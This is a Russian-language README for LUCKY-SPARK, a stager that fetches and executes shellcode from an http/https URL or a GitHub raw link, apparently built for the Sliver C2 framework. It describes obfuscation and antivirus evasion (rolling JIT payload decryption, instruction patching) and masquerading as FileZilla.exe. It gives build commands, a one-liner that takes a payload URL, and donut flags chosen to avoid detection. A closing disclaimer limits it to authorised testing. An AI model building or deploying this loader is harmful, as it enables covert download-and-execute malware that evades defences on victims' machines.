
Скрытный загрузчик, предназначенный для полезных нагрузок (шеллкода), размещаемых через http/https, как в Sliver, или на raw-ссылках GitHub.
⟪ LUCKY-SPARK ⟫ — это стейджер, предназначенный для полезных нагрузок (shellcode), раздаваемых через http/https, например Sliver или GitHub raw. Он использует современные методы обфускации и обхода защиты, такие как скользящее окно JIT-дешифрования полезной нагрузки и патчинг инструкций процессора. По умолчанию создаётся исполняемый файл, маскирующийся под FTP-клиент FileZilla.
Склонируйте или скачайте репозиторий и убедитесь, что в вашей системе установлены make и .
mingwgit clone <repository_url>
cd LUCKY-SPARK
Запустите скрипт создания бинарного файла.
./luckySpark.sh
Вас попросят ввести URL вашей поэтапной полезной нагрузки и, при желании, User-Agent.

Может быть выполнено одной строкой для включения в скрипты:
./luckySpark.sh -u https://github.com/GITHUBNAME/PAYLOADREPO/raw/refs/heads/main/PAYLOAD.bin -a "Mozilla/5.0"

Если вы используете donut или Sliver (который использует donut), рекомендую следующие флаги для создания полезной нагрузки:
donut.exe -i examplePayload.exe -a 2 -e 1 -z 1 -b 1 -o payload.bin
Это позволяет избежать подозрительного и помечаемого антивирусами поведения donut. Как ни странно, именно методы обхода donut чаще всего вызывают срабатывание детектов.
При этом создаётся бинарный файл filezilla.exe, который при запуске получает и выполняет полезную нагрузку.
Этот стейджер был разработан для использования со Sliver. Подготовьте поэтапную полезную нагрузку Sliver, как описано здесь: Sliver Staging Не шифруйте полезную нагрузку.
Но подойдёт любой метод поэтапной подачи на основе http/https,
например python3 -m http.server
или полезная нагрузка, загруженная на github.com в публичный репозиторий.
Этот стейджер НЕ поддерживает протокол поэтапной подачи meterpreter.
Step 1: RIP hits Page 0 and Page 0 gets decrypted
Pages: [ D | E | E | ... ]
RIP -> ^
Step 2: RIP hits Page 1 and Page 1 gets decrypted
Pages: [ D | D | E | ... ]
RIP -> ^
Step 3: RIP hits Page 2 and Page 2 gets decrypted. Page 0 gets encrypted
Pages: [ E | D | D | ... ]
RIP -> ^
LUCKY-SPARK предназначен только для образовательных, исследовательских целей и авторизованного тестирования на проникновение. Несанкционированное использование против систем без разрешения незаконно и неэтично.